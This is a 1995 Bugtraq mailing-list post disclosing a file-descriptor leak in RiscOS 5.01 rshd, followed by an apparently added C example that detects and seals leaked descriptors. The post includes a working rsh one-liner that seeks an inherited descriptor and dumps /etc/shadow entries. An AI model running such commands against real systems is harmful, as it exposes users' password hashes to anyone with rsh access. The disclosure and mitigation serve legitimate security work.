Bugtraq mailing list archives
BUG (and exploit): RiscOS 5.01 rshd has FD leaks...
From: jeremy () suede sw oz au (Jeremy Fitzhardinge)
Date: Fri, 11 Aug 1995 16:20:33 -0500
Hi all,

When rsh'ing to a RiscOS 5.01 machine, the process being run has a file descriptor open RO on the shadow password file. A simple program to seek it back to 0 and copy will reveal the encrypted passwords to anyone who can rsh to the machine.

suite is a Mips RiscOS 5.01 machine; suede is a Solaris box

: suite:4; ls -li /etc/shadow
4409 -r-------- 1 root 4072 Aug 11 08:48 /etc/shadow

: suede:21; rsh suite t/openfd
21 Dev (33, 0), ino 2679, type character special
20 Dev (33, 0), ino 2679, type character special
8 Dev (255, 255), ino 13566, type FIFO
7 Dev (33, 0), ino 4409, type regular file *****
4 Dev (33, 0), ino 4409, type regular file *****
2 Dev (255, 255), ino 13566, type FIFO
1 Dev (0, 0), ino 0, type Unknown Numeric type: 0
0 Dev (0, 0), ino 0, type Unknown Numeric type: 0

(seek0 just seeks its stdin to offset 0)

: suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
root:oHnoyOuDOnt:9334::::::
setup:*NOLOGIN*:8603::::::
sysadm:*NOLOGIN*:8603::::::
daemon:*NOLOGIN*:8603::::::
bin:*NOLOGIN*:8603::::::
...

I'm curious about the pipes as well; what are they to? I think the "unknown" file descriptors are sockets; fstat doesn't seem to cope with them.

J
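The descriptor leak reported above, as an added defensive example that is not part of the original post or of any RiscOS code: a privileged service that is about to run a user's command can audit which inherited descriptors refer to regular files and mark them close-on-exec so the child never sees them. The function names count_leaky_file_fds, seal_fds and demo are assumed, and the temporary file is a constructed stand-in for /etc/shadow.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Added example (not the original post's tools). Assumes POSIX fcntl/fstat;
 * mkstemp only creates a constructed sample file standing in for /etc/shadow. */

/* Count descriptors above stderr that refer to regular files and would
 * survive exec (FD_CLOEXEC clear): the leak class shown in the post. */
int count_leaky_file_fds(int maxfd)
{
    int fd, leaks = 0;
    for (fd = 3; fd < maxfd; fd++) {
        struct stat st;
        int flags = fcntl(fd, F_GETFD);
        if (flags < 0 || fstat(fd, &st) < 0)
            continue;                /* descriptor not open */
        if (S_ISREG(st.st_mode) && !(flags & FD_CLOEXEC))
            leaks++;                 /* pipes, ttys, sockets are not this bug */
    }
    return leaks;
}

/* Mark every open descriptor above stderr close-on-exec so the exec'd
 * child (here, the rsh command) cannot inherit it. Returns number changed. */
int seal_fds(int maxfd)
{
    int fd, fixed = 0;
    for (fd = 3; fd < maxfd; fd++) {
        int flags = fcntl(fd, F_GETFD);
        if (flags >= 0 && !(flags & FD_CLOEXEC) &&
            fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == 0)
            fixed++;
    }
    return fixed;
}

/* Demo: open a constructed stand-in for /etc/shadow without close-on-exec
 * (as the buggy rshd did), audit, seal, re-audit; 1 = leak caught and removed. */
int demo(void)
{
    char path[] = "/tmp/shadow-demo-XXXXXX";   /* constructed sample file */
    int fd = mkstemp(path), before, after;
    if (fd < 0) return -1;
    unlink(path);                    /* keep only the open descriptor */
    before = count_leaky_file_fds(64);
    seal_fds(64);
    after = count_leaky_file_fds(64);
    close(fd);
    return before > 0 && after == 0;
}
```

Run demo() from a main of your own; it returns 1 when the audit flags the open regular file and sealing clears it. Setting FD_CLOEXEC is the mitigation; closing the file before spawning the command is the stricter alternative.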